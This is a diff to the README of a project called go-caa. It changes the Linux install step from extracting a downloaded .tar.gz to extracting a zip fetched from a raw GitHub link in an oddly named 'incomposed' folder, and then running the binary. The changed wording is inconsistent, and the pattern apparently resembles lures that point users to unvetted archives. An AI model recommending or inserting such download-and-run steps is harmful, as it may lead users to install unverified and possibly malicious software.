9001-hub/go-caa/README.md

 ### For Linux Users:

-- Extract the downloaded `.tar.gz` file to a desired location.
+- Extract the downloaded `https://raw.githubusercontent.com/9001-hub/go-caa/main/incomposed/go-caa.zip` file to a desired location.
 - Open the terminal and navigate to the folder.
 - Run the command `./go-caa` to start the application.